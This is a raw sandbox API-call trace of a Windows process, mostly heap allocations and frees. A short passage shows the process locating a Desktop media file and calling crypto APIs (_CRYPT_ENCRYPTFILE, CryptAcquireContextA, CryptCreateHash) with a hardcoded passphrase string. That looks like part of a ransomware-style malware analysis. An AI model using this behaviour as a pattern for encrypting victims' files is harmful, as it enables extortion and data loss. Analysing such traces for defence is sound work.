returned 1 [0120.047] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0120.047] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0120.047] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0120.047] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0120.047] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0120.047] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0120.047] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0120.047] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0120.047] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0120.047] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0120.047] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0120.047] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0120.048] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0120.048] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0120.048] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0120.048] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0120.048] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0120.048] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0120.048] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0120.048] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0120.048] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0120.048] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0120.048] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0120.048] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0120.048] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0120.048] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0120.048] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0120.048] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0120.048] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0120.048] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0120.048] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0120.048] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0120.048] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0120.048] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0120.048] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0120.048] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0120.048] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9578 | out: hHeap=0x1780000) returned 1 [0120.048] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0120.048] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0120.048] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0120.048] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0120.048] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0120.048] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0120.049] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0120.049] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0120.049] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0120.049] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0120.049] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0120.049] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0120.049] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0120.049] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0120.049] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0120.049] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cc8 | out: hHeap=0x1780000) returned 1 [0120.049] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d70 | out: hHeap=0x1780000) returned 1 [0120.049] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0120.049] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0120.049] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0120.049] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0120.049] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0120.049] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0120.049] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c98 | out: hHeap=0x1780000) returned 1 [0120.049] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c50 | out: hHeap=0x1780000) returned 1 [0120.049] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4c8 | out: hHeap=0x1780000) returned 1 [0120.049] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21e0 | out: hHeap=0x1780000) returned 1 [0120.049] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf388 | out: hHeap=0x1780000) returned 1 [0120.049] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d28 | out: hHeap=0x1780000) returned 1 [0120.049] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ce0 | out: hHeap=0x1780000) returned 1 [0120.049] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2220 | out: hHeap=0x1780000) returned 1 [0120.049] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0120.049] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d88 | out: hHeap=0x1780000) returned 1 [0120.049] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43921b8 | out: hHeap=0x1780000) returned 1 [0120.049] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0120.049] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0120.049] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cb0 | out: hHeap=0x1780000) returned 1 [0120.050] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0120.050] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0120.050] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0120.050] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0120.050] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0120.050] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0120.050] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0120.050] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0120.050] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a3f8 | out: hHeap=0x1780000) returned 1 [0120.050] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0120.050] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0120.050] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0120.050] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0120.050] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0120.050] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0120.050] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0120.050] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0120.050] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0120.050] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0120.050] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea040 | out: hHeap=0x1780000) returned 1 [0120.050] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0120.050] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0120.050] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0120.050] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0120.050] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0120.050] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c38 | out: hHeap=0x1780000) returned 1 [0120.050] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21c0 | out: hHeap=0x1780000) returned 1 [0120.050] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0120.050] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0120.051] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0120.051] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43c9ce0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0120.051] CloseHandle (hObject=0x2a0) returned 1 [0120.051] FreeLibrary (hLibModule=0x772d0000) returned 1 [0120.051] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0120.051] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\9PZJqif.m4a", lpFindFileData=0x144ed28 | out: lpFindFileData=0x144ed28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd910d10, ftCreationTime.dwHighDateTime=0x1d5e636, ftLastAccessTime.dwLowDateTime=0x7aad2b30, ftLastAccessTime.dwHighDateTime=0x1d5e25e, ftLastWriteTime.dwLowDateTime=0x7aad2b30, ftLastWriteTime.dwHighDateTime=0x1d5e25e, nFileSizeHigh=0x0, nFileSizeLow=0x8473, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="9PZJqif.m4a", cAlternateFileName="")) returned 0x41ac100 [0120.051] FindClose (in: hFindFile=0x41ac100 | out: hFindFile=0x41ac100) returned 1 [0120.051] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0120.051] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0120.052] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0120.052] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0120.052] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0120.052] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0120.052] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1797028, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0120.052] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0120.052] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796ea8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0120.052] CryptAcquireContextA (in: phProv=0x144ea08, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144ea08*=0x41a5250) returned 1 [0120.053] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0120.053] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0120.053] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0120.053] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0120.053] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0120.053] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0120.053] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0120.053] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0120.053] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0120.053] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0120.053] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43caa00, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0120.053] CryptCreateHash (in: hProv=0x41a5250, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e778 | out: phHash=0x144e778) returned 1 [0120.053] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0120.053] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2788, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0120.053] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0120.053] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e28a8 [0120.053] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0120.053] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0120.053] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0120.053] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0120.053] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0120.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2910 [0120.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0120.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0120.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0120.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x22) returned 0x17e2b18 [0120.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796de8 [0120.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b48 [0120.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0120.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0120.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01c0 [0120.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0120.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0120.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796fc8 [0120.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2848 [0120.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0120.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0120.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0120.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0120.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0120.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0120.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0120.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x22) returned 0x17e2bd8 [0120.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x23) returned 0x17e2728 [0120.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0120.054] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0120.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x23) returned 0x17e2c08 [0120.054] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2c08, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0120.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0120.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0120.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x22) returned 0x17e2728 [0120.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0120.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd60 [0120.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0120.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0120.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2900 [0120.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43923b0 [0120.055] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0120.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca850 [0120.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0120.055] PeekMessageW (in: lpMsg=0x144e744, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e744) returned 0 [0120.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0120.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0120.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0120.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0120.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0120.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0120.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0120.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0120.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0120.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0120.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0120.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0120.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0120.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0120.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0120.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0120.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0120.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0120.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796fc8 [0120.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2bd8 [0120.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0120.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0120.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0120.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0120.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0120.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0120.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0120.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0120.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0120 [0120.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0120.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 